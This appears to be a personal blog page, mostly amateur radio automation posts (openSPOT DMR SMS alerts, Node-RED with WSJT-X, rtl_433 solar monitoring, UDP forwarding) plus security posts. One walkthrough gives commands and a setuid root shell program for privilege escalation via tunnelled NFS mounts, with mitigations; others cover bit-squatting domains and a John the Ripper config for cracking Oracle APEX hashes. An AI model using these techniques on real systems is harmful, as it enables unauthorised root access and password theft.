WSJT-X alerts to MD-380 with the openSPOT HTTP API

DMR SMS alerts using the SharkRF openSPOT with Node-RED

I recently acquired a SharkRF openSPOT for use as a hotspot to connect to the Brandmeister DMR network with my MD-380 DMR radio as I have no easily accessible repeaters nearby to use for DMR.

I have nothing but good things to say about this device, it works very well, the UI is simple to use, reported bugs are fixed very quickly and new features added with new firmware. The icing on the cake is it is a very accessible device with a HTTP and UDP API to interact with! I’ve only toyed with some features in the HTTP API but happy with what I’ve seen so far.

The first use I came up with for it was receiving DMR SMS messages to my MD-380 from my existing WSJT-X & Node-RED setup. The status-dmrsms API allows us to receive and send SMS messages over the local RF link to our connected DMR radio by specifying its DMR ID. This functionality works exactly as described in the API documentation now and if you follow it you will get a beer.

BEER

BEER from the SharkRF openSPOT HTTP API

In order to get this working in to Node-RED a flow was needed to handle authentication. As described in the Login Process, we need to hash our openSPOT password with a provided token to get a digest for use in all communication to the API, this digest is valid for 60 minutes.

The flow below shows the authentication process it as set up at the moment.

Node-RED openSPOT API Login

Node-RED openSPOT API Login

The inject at the beginning just sends a time stamp, which is unused, to start this flow off on Node-RED start-up and every 30 minutes thereafter. After the login is posted some global variables are set with the login status, the token and the digest if authentication was successful. This should hopefully tick away to ensure we will have a valid digest to hand at all times.

The posting of messages is easy and exactly as documented in the API description. With the digest already in a global variable from the login process above, we take any text input, limit it to 75 characters, convert to UTF16BE HEX and post it in the correct format for our radio. The full flow including the message input from WSJT-X is pictured below.

Full flow for using the openSPOT API

Full flow for using the openSPOT API

The inject function in the send flow is just there for testing purposes to insert a test message manually and the success function at the end just writes the status to the debug console.

With the above all set up we just wait for the DX to light up our DMR radio with an SMS message, the image below shows this on an earlier version of the same flow.

WSJT-X alerts to MD-380 with the openSPOT HTTP API

WSJT-X alerts to MD-380 with the openSPOT HTTP API

Alerts from Node-RED via Twitter or IRC might be easier but at least with the above it is all contained on the RF side and doesn’t need the Internet🙂

It has been running for a few days now and seems to be working fine. I’ll try and wrap it all up in a more easily deployed function if I get the time but if anyone wants the nasty code before then just drop me a line.

Node-Red WSJTX

WSJT-X monitoring with py_wsjtx & Node-RED

An article about Node-RED by G4WNC in a recent Practical Wireless gave me the push to try and use it in my own radio set-up for alerting and monitoring using a spare Raspberry Pi.

The goal is to receive notifications when my own local radio spots new DXCC on HF bands, any WSPR or JT spots on 6m+ and to plot the 2m JT65b beacons I can hear over time amongst other things.

Prior to this I was only monitoring the beacons using a script and forwarding this to openHAB over MQTT to display alongside some house statistics. This wasn’t too flexible and openHAB is a bit of a burden on the Pi which would randomly hang.

For this project I’m wanting to take inputs from different physical radios & SDR with multiple copies of WSJT-X to display, log certain decodes and alert me in multiple ways if interesting things are seen.

The set-up currently has three radio inputs, each of these has a WSJT-X instance with its own configuration:

  1. HF Radio (IC-7300 and/or FT-817)
  2. VHF Radio (FT-847)
  3. GQRX (IF out of FT-847)

Input 1 is set to whatever I’ve left the HF radios monitoring.

Inputs 2 and 3 are usually set to monitor the two JT65B enabled 2m beacons I can hear from this location, GB3VHF and GB3NGI, using the same antenna. I have this graphed on openHAB but it’s not working great so will be using something else and graphing from the database instead at some point.

WSJT-X can output status messages and decodes over the network to a configured address, this is discussed in a previous blog post where we split the output to AlarmeJT and CQRLOG. We will add a third listener on an extra port, py_wsjtx.

Py_wsjtx is a Python network listener that takes the network output from WSJT-X and displays it in a console, either line by line or a curses interface. I have all of the WSJT-X instances sending their data to a single py_wsjtx instance.

py_wsjtx

As can be seen above, this is really handy for monitoring things from a console rather than the GUI and will highlight new DXCC spots and CQ calls. It can also output the decoded messages to an MQTT broker if configure which comes in really useful for what we’re doing here.

Node-RED allows us to easily take these MQTT inputs, process them in whatever way we want and act upon them. The image below shows the current set-up.

Node-Red WSJTX

The purple boxes are MQTT inputs and outputs, each of these points to an MQTT broker (running on the same Raspberry Pi) and listens or sends messages for a particular topic. Py_wsjtx sends MQTT messages in the format py_wsjtx/WSJT-X radioname/messagetype which makes it easy for us to configure Node-RED to process them in the correct manner for instance filtering by radio or by decode type.

Working from the top row of the flow down:

  1. GQRX and FT847 JT65b beacon decodes are converted to JSON, then they are forwarded on in three ways:
    1. All decodes go to openHAB which is graphing things at the moment, this is shown in the image below and I have it copied to my qrz.com page, I’ll be changing this shortly to something more reliable/configurable.Beacon monitoring
    2. All decodes are logged to a MySQL database which I will use for generating graphs when we stop using openHAB.
    3. If the decodes are above set levels, <5 for GB3NGI and <20 for GB3VHF, then send a post to twitter and to me on a local IRC server.
  2. Next we have DXCC alerts from WSJT-X, if it spots a new country then a message is sent to twitter and IRC with the spot, hopefully I will see it and respond. To make it more interesting I had it ring the shack doorbell, I’ve got two ways to do this, using a HackRF to replay the wireless doorbell, which is a bit of a waste of an expensive SDR, or ringing via a second remote unit using the Pi GPIO pins. The ringer got annoying quickly so it’s now turned off, flashing a light may be better!
  3. Next up we have an input for any WSPR spots on any radio. I’m not doing much with this at the moment other than alerting me on local IRC/twitter if there are any spots on 6m/4m/2m, I don’t often have WSPR listeners on these band though but if I think conditions are looking likely I will switch one of the WSJT-X instances to it.
  4. The solar inverter statistics are sent out on 433.9mhz and I use an RTL SDR dongle to receive them and decode with the program rtl_433. These are then rate limited and forwarded to openHAB as well as being written to the database.
  5. The other MQTT inputs are DHT11 temperature and humidity sensors in the house hooked up to various Pi I have. I’ve not got around to doing anything with these in Node-RED yet but they are currently used by openHAB.

Not much more to say other than it works well for me and I plan on playing about with the flow some more to add some more alerting rules and cutting openHAB out of the solution entirely by graphing the outputs from the database in a more accessible way.

Solar PV Output in openHAB Using RTL_433

I’ve been playing a little with the fantastic open source home monitoring and automation solution openHAB on a Raspberry PI 2 . Having started off with some small temperature/humidity sensors I was looking for something else to add and the stats from the Solar panels were an obvious want.

I previously had the Inverter monitored using using Auroramon as described here. This was great but it’s stopped working and I’m putting off crawling around the attic to debug the issue for as long as possible.

I can keep an eye on the Inverter output using a standalone wireless monitor, the OWL Micro+, which has a small transmitter sensor clamped to the output from the Inverter giving current generation statistics. There is however no way of hooking this up to a computer to record the stats, so enter rtl_433..

The rtl_433 application uses an RTL SDR dongle to receive and decode a huge selection of wireless sensors transmitting on 433 MHz. I didn’t see the OWL device in the list but on running rtl_433 we see statistics generated every 15 seconds when power is being generated and totals every 60 seconds when there’s no generation.

Energy Sensor CM180 Id 62a0 power: 48W, total: 11242215648W, Total Energy: 3122.837kWh

With the output from this we can pull out the power generated and send it via an MQTT message using mosquitto_pub to a listening MQTT broker we have openHAB set up to use already.

This is ghastly but it works for now, for some reason the unit reads 48w when idle so there’s a bit of fiddling to make it idle at 1:

rtl_433 2> /dev/null | xargs -I {} sh -c “mosquitto_pub -h 192.168.1.1 -t solar -m \$(echo {} |  sed -e ‘s/, .*//’ -e ‘s/^.*: \([0-9]\+\).*/\1/’|while read spo; do if [ \$spo -gt 50 ]; then echo \$spo; else echo 1; fi; done)”

I’ve made some changes to my set-up where everything is now being fed in to node-red which processes MQTT messages so the following is a bit more simple and outputs in JSON and lets node-red do the filtering:

rtl_433 -R 12 -F json 2> /dev/null | parallel –tty -k mosquitto_pub -h 192.168.1.1 -t solarout -m {}

At the openHAB side I’ve an item “solar” set up and can see the current generation and day/week charts, it’s been running a few days now and been no problem at all!

Screenshot-16

Future plans with this one will be to capture the output in a less Frankenstein manner or maybe risk broken ribs by crawling around the roof space to fix the monitor on the Inverter.

AlarmeJT

Using WSJT-X in Linux with CQRLOG and AlarmeJT

WSJT-X offers a handy UDP network service for two way communication with other applications such as logging or monitoring software, but I had some difficulties using it with multiple applications at the same time.

WJST-X is set up to communicate with a listening UDP server in the Settings->Reporting section as the image below, by default it is set up to send packets to the localhost port 2237.

WSJT-X UDP Server Settings

There are a number of software packages in Linux that support this communication from WSJT-X such as CQRLOG and AlarmeJT.

CQRLOG uses it in remote mode to allow automatic logging of QSOs from WSJT-X saving a lot of time and errors.

AlarmeJT, pictured below, is a handy application that takes decodes and displays them alongside information such as whether the DXCC/Locator is required based on logs provided to it and can communicate in response to WSJT-X to tune to the selected call.

AlarmeJT

The only problem is by default, as far as I understand, we can only use one of these programs at a time with WSJT-X. WSJT-X sends its UDP traffic to one address/port but each of the two consuming applications will try to exclusively bind this port preventing the other application from doing the same.

WSJT-X can be configured to send to multicast addresses to allow multiple applications on the network to consume the same data. However I’m running both applications on the same workstation and one of the applications doesn’t allow the listener IP to be set and the other wouldn’t let me change the settings at all in addition to the binding issues. So the plan was to find some way of duplicating the UDP packets to multiple destinations.

Some Startpage searching before attempting to do this with iptables or Python (a quick test indicated it would be possible) identified an already written user-space tool, samplicator, that does the forwarding we need here. It is easy to compile and use.

The idea is to have WSJT-X configured to send to the samplicator listener on local port 2000 and have it send copies of the received packets to a CQRLOG listener on port 2238 and also to an AlarmeJT listener on the default port 2237.

Packet Flow
The command to implement this is as below and I’ve put it in my /etc/rc.local to run at boot.

samplicate -S -p 2000 127.0.0.1/2237 127.0.0.1/2238

Here we are listening on port 2000 and forwarding copies of the UDP packets to 127.0.0.1 port 2237 and 2238. The -S options is especially handy as it spoofs the source addresses to appear exactly as sent which allows the consuming applications to communicate in response such as to allow tuning to a station when clicking on a CQ in AlarmeJT, without this set they can just consume the data.

It seems to work well with the limited traffic we’re using here and lets me parse decodes quickly for their statistics, tune quickly to calls and to log the successful QSO automatically. Now I just need to make a few hundred contacts to make up for the time spent fiddling about with this stuff to save time…

NFS Pivoting Via SSH For Easy Privilege Escalation And More

It’s easy to take advantage of insecure NFS mounts to escalate privileges on a system you have user level SSH access to without introducing any tools to the remote system by tunneling our NFS traffic and having our source appear to be that of the target server. This can be done without direct network access to the NFS server and does not require us being defined in the exports access control list. If the NFS server was directly accessible and mountable from our location we would just do this the normal way and mount directly.

In this instance the set-up might be a Linux server that has a mounted NFS export without root_squash or secure set and is mounted without the nosuid or noexec option. This situation is not that uncommon in NFS heavy environments.

We also do not need to be able to route directly to the NFS server from our attacker location so it being in an inaccessible or firewalled zone doesn’t cause a problem. By tunnelling the NFS connection using SSH port forwarding we will be assuming the identity of the target server so if an export is available to it, it’s available to us!

The three systems described in the scenario are as below, the NFS server is only accessible to the target system here.

      +----------+   +--------+   +------------+
      | Attacker |-->| Target |-->| NFS Server |
      +----------+   +--------+   +------------+

Firstly check the mounted file systems on the target system with the mount command looking for an already mounted NFS export that you have read access to and is not mounted with the nosuid/noexec options:

nfs-filer:/export/filesystem1 on /filesystem1 type nfs (rw,addr=1.2.3.4)

Take a note of the IP address of the NFS server and also take note of other exported file systems that may be available to the target but not mounted using showmount -e.

Back on the attacker system, ssh to the target and port forward the local NFS port 2049 to the remote NFS server port 2049 via the target.

attacker # ssh -L 2049:NFS-Server-IP:2049 ouruser@target

Now as long as the above was successful, on the attackers system as root we locally mount the chosen export using our forwarded port.

attacker # mount -v -t nfs -o port=2049,tcp localhost:/export/filesystem1 /mnt/filesystem1

Now on the attacker system we check that we can access the contents of /mnt/filesystem1 and that we have write access as root by creating a file and checking the owner on the target system, this should be owned by root.

attacker # touch /mnt/filesystem1/.nfstest

target $ ls -l /filesystem1/.nfstest
-rw-r--r-- 1 root root 0 Mar 14 01:49 /filesystem1/.nfstest

Now back on the attacker host we can chmod +s this file to check suid files can be created and we should hopefully see the following:

attacker # chmod +s /mnt/filesystem1/.nfstest

target $ ls -l /filesystem1/.nfstest
-rwsr-sr-s 1 root root 0 Mar 14 01:49 /filesystem1/.nfstest

Now if we want to take advantage of this on the attacker system we can do something like the following to create a suid binary, this can be compiled on the remote file system or the attacker system depending on the circumstances.

attacker # cat suidsh.c
#include
int main() { setuid(0); setgid(0); execl(/bin/sh, sh, NULL); }
attacker # gcc -o /mnt/filesystem1/.nfstest suidsh.c
attacker # chmod +s /mnt/filesystem1/.nfstest

Now head on over to the target system and do the deed:

target $ ls -l /filesystem1/.nfstest
-rwsr-sr-s 1 root root 0 Mar 14 01:49 /filesystem1/.nfstest
target $ id
uid=1000(luser) gid=1000(luser) groups=1000(lusers)
target $ /filesystem1/.nfstest
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root)
sh-4.1# #bingo :)

Even if the above fails due to root squashing, nosuid or some other reason we still have access to the contents of the exported file system via our tunnelled mount which in itself might provide enough win.

Another thing we can do is to mount file systems that are available to the target system even if they are not mounted by the target. It’s always worth having a look around for other NFS exports or servers that might be available to the Target that can be tunnelled in this way.

A few NFS export options can be set to prevent the above, the use of the secure option will require connections come from a port below 1024 meaning our mounting as a normal user using an SSH tunnel would not work. The use of root_squash which is a common default now would also prevent us becoming root, however we may still be able to become or alter another users content which might lead to root privileges. The local mount options of nosuid and noexec would prevent suid files and executable files on the mount but again there may be other ways to escalate depending on the file system contents.

The above will also not work if ssh port forwarding has been disabled, however with shell access on the target system we can just do this another way if needs be. We could also do a lot of the above with user space tools introduced to the target system but I prefer solutions that do not require uploading tooling to systems wherever possible.

Some Bitsquatting Observations

I registered a basket full of bit-squatting domains last year and as they all recently expired I thought I’d give a few observations about my experience.

The idea is that memory errors on end devices or intermediate equipment results in occasional bits being flipped in memory. Where one of these flips happens to land on a domain name in memory, the flip might change it to another valid character and send traffic to the corrupt domain instead. While these errors are exceptionally rare, the internet is exceptionally big so we can observe this behaviour with high enough traffic domains. You can read read about it here and there’s a good video here about this and other fun DNS stuff.

Now despite reading the papers and seeing the presentations it still seemed a bit far out, so as domains are cheap I registered a few to validate this for myself as it looked quite fun. I was surprised at the time that so many squats were available despite this being a well known issue with talks being given at Defcon, even the the exact domains provided in papers/talks were available. I was also a bit disappointed at this, are the companies subject to the publicised squats not interested in preventing further abuse of this? And why were the security community not picking these up to validate for themselves or just for a laugh?? Oh well..

My set-up used a slightly modified copy of dnschef to serve requests, a web server logging connections and headers, smtp-sink to log emails and logging of DNS lookups and some other traffic with tcpdump. Unfortunately due to a cock up I blew the six months of results away in a botched migration. Oh well..

I pretty much ended up with the same observations as others that presented their findings, lots of requests for well used domain names and a significant number from mobile devices and not many verifiable bit flip hits on the less popular domains.

There were a decent number of requests that could have been pretty bad for the squatted organisation had they been taken advantage of such as lookups for internal host names from the organisations themselves, requests for certificates and software updates and the likes.

No valid SMTP traffic was observed logging email headers but there was an insane quantity of spam. I’m not entirely sure whether the spammers had been subject to bitflips or whether they just had typos in their lists but it was enough to make me give up on this monitoring very quickly.

As about 12 months had passed since my disappointment in so many of the squat domains being available, I compared the availability now to then. This time about there was a more marked change.

One example would be in the gstatic.com domain that was used in the demonstrations and presentations:

  • gstatic.com – October 2013 – 26 squats unregistered
  • gstatic.com – October 2014 – 0 squats unregistered

This reduction in availability was observed in other domains too, interestingly most of the gstatic squats and some of the other domains appear to have been registered by the same individual with the name servers at bitfl1p.com so at least some one is having fun🙂

I’d recommend trying some bit squatting out, it’s easy and cheap to do and with some careful domain choice it can lead you to some amusing and unpredictable results. Plus it’s funky knowing that a cosmic ray might just be the cause for that traffic coming your way!

Cracking APEX Hashes with John, Long Salts

Cracking APEX hashes with john the ripper doesn’t often cause me any bother but I’ve come across two instances where john would not crack the hashes provided, this turned out to be due to the user name and workspace it uses as a salt being too long.

The easiest way to obtain the hashes with access to the database is using dump-apex-hashes.sql while making sure to alter the schema to match the version you are using. After this we can reformat with apex2john.py and crack away. The semi automated process along with the manual process is described well here.

The john input we might end up with after following the above steps is:

$dynamic_1$f96d32cbb2fbe17732c3bbab91c14f3a$10ADMIN

Cracking this APEX hash with john results in the following:

Loaded 1 password hash (dynamic_1: md5($p.$s) (joomla) [128/128 SSE2 intrinsics 10x4x3])
password (?)

The above hash uses the trailing 10ADMIN string as the salt. This salt is made up of the workspace name plus the user name, to demonstrate this we can see the following example matches the hash cracked as “password” above:

>>> print hashlib.md5("password" + "10" + "ADMIN").hexdigest()
f96d32cbb2fbe17732c3bbab91c14f3a

Where I’ve had a problem is when the workspace name plus the user name is greater than 31 characters, quite why someone would pick such a long workspace name I don’t know but they do!

When this salt ends up over 31 characters we run in to a problem, john no longer picks it up as valid:

cat apex;./john apex 
$dynamic_1$98d706b82b654265e71ea7db05eccbfa$4782602601579360ABCDEFGHIJKLMNOPQ
No password hashes loaded (see FAQ)

Adding the following dedicated APEX configuration to john’s dynamic.conf file will allow us to use dynamic_1011 to crack the hashes, the main difference with this one being it doesn’t have a maximum “Saltlen”.

####################################################################
# Crack APEX hashes with long salts - Radwire
####################################################################
[List.Generic:dynamic_1011]
Expression=md5($p.$s) (APEX long salts)
Flag=MGF_SALTED
Func=DynamicFunc__clean_input
Func=DynamicFunc__append_keys
Func=DynamicFunc__append_salt
Func=DynamicFunc__crypt_md5
Test=$dynamic_1011$B932A7CB1C06A03310921989DACBA3F7$4782602601579360ABCDEFGHIJKLMNO:password

Now when we try again after substituting dynamic_1 with dynamic_1011 we see the hash that wasn’t picked up before works okay:

cat apex;./john apex
$dynamic_1011$98d706b82b654265e71ea7db05eccbfa$4782602601579360ABCDEFGHIJKLMNOPQ
Loaded 1 password hash (dynamic_1011 md5($p.$s) (APEX long salts) [128/128 SSE2 intrinsics 10x4x3])
password1        (?)